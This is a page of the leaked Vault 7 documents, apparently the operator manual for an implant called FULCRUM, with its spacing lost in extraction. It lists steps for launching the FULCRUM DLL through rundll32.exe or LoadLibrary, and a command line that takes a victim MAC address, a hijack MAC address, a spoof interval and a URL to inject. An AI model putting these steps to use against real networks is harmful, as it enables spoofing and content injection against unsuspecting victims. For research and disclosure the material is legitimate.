Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.
UNCLASSIFIED//LES
UNCLASSIFIED//LES Page18
7.1.9 RUNNINGFULCRUMASADLLUSINGRUNDLL32.EXEWITHACONFIGURATIONFILE
1. PrepareaconfigurationfileasdescribedinSection7.1.1
2. EncryptaconfigurationfileasdescribedinSection7.1.3
3. CopytheFULCRUMDLLbinary(f32.dll)intothesamedirectoryastheconfigurationfile.
4. Openacommandprompt
5. ChangedirectoriestothelocationoftheFU LCRUMbinary.
6. Executethebinarybytypingthefollowingcommandintothecommandprompt:
rundll32.exef32.dll,rundll_entry
7.1.10 RUNNINGFULCRUMASADLLUSINGRUNDL L32.EXEWITHCOMMANDLINE
PARAMETERS
1. CopytheFULCRUMDLLbinary(f32.dll)tothedesiredlocation.
2. Openacommandprompt
3. ChangedirectoriestothelocationoftheFULCRUMbinary.
4. Executethebinarybytypingthefollowingcommandintothecommandprompt:
rundll32.exef32.dll,rundll_entry[VictimMACAddress][HijackMACAddress][MillisecondsbetweenSpoofs]
[InjectedURL]
Forexample:
rundll32.exef32.dll,rundll_entryAA:AA:AA:AA:AA:AABB:BB:BB:BB:BB:BB1000http://test.com/cool.jpg
7.1.11 RUNNINGFULCRUMASADLLUSINGLOADLIBRARYWITHACONFIGURATION FILE
1. PrepareaconfigurationfileasdescribedinSection7.1.1
2. EncryptaconfigurationfileasdescribedinSection7.1.3
3. CopytheFULCRUMDLLbinary(f32.dllorf64.dll)tothesamedirectoryastheconfiguration
file.
4. Fromtheparentprocess,loadthebinaryusingLoadLibrary
5. Fromtheparentprocess,gettheparameterlessexportusingGetProcAddress(“func”).This
function’ssignatureis:voidfunc(void)
6. Fromtheparentprocess,callfunc
7.1.12 RUNNINGFULCRUMASADLLUSINGLOADLIBRARYWITHCOMPILEDPARAMETERS
1. CopytheFULCRUMDLLbinary(f32.dllorf64.dll)todesiredlocation.
2. Fromtheparentprocess,loadthebinaryusingLoadLibrary
3. Fromtheparentprocess,gettheparameterlessexportusingGetProcAddress(“func”).This
function’ssignatureis:voidfunc(void)
4. Fromtheparentprocess,callfunc